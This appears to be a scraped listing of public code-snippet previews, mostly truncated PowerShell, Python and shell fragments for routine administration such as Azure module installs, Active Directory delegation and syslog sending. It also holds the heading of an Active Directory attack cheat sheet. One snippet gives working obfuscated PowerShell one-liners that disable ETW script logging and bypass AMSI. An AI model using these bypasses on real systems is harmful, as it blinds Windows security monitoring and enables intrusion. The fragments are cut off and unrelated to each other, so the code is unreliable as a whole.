talkingmoose

#!/bin/bash

<<ABOUT_THIS_SCRIPT
-------------------------------------------------------------------------------

	Written by:William Smith
	Professional Services Engineer
	Jamf
	[email protected]
	https://gist.github.com/2cf20236e665fcd7ec41311d50c89c0e

daephx

<#
.SYNOPSIS
    Diffrent methods for displaying relative path
#>

# Existing Path
$PWD | Resolve-Path -Relative

# Replace String
$Path -replace [regex]::Escape((Get-Location).Path), '.'

ssstonebraker

Note: I did not author this, i found it somehwere.

Active Directory Attacks

Summary

• Tools
• Most common paths to AD compromise
  • MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
  • Open Shares
• [GPO - Pivoting with Local Admin

K0rt3x3rr0r

import sys
import ldap
import ldap3
import re
import psycopg2
import base64

from ldap3 import Server, Connection, ALL

from flask import current_app, jsonify, request

asikorski

Install-Module -Name Az -AllowClobber -Scope CurrentUser
Install-Module -Name PSModuleDevelopment -AllowClobber -Scope CurrentUser
Install-Module -Name PSFramework -AllowClobber -Scope CurrentUser
Install-Module -Name AzureAD -AllowClobber -Scope CurrentUser
Install-Module -Name Pester -RequiredVersion 4.10.1 -AllowClobber -Scope CurrentUser
Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'
 az extension add --name azure-devops

reigningshells

# Logging bypass:

(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))

# AMSI Bypass (old, burned)

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

# New AMSI bypass obfuscation:

aledeniz

# Adapted from Joe Corey's Active Directory Delegation via PowerShell at
# https://blogs.technet.microsoft.com/joec/2013/04/25/active-directory-delegation-via-powershell/ 
 
Import-Module ActiveDirectory
#Bring up an Active Directory command prompt so we can use this later on in the script
cd ad:
 
#Get a reference to the RootDSE of the current domain
$rootdse = Get-ADRootDSE
 

indented-automation

function Update-RegistryFile {
    <#
    .SYNOPSIS
        Updates a registry file.
    .DESCRIPTION
        Line break and certain characters will not import from standard registry files (even if export works).

        This function replaces any entry with line breaks with a hex value representing the string.
    #>

indented-automation

function Send-Syslog {
    param (
        [Parameter(Mandatory, ValueFromPipeline)]
        [String]$Message,

        [String]$LogLevel = 'Information',

        [Parameter(Mandatory)]
        [IPAddress]$IPAddress,

indented-automation

function ConvertTo-TableFormat {
    <#
    .SYNOPSIS
        Rebuild an object based on the Format Data for the object.
    .DESCRIPTION
        Allows an object to be rebuilt based on the view data for the object. Uses Select-Object to create a new PSCustomObject.
    #>

    [CmdletBinding()]
    param (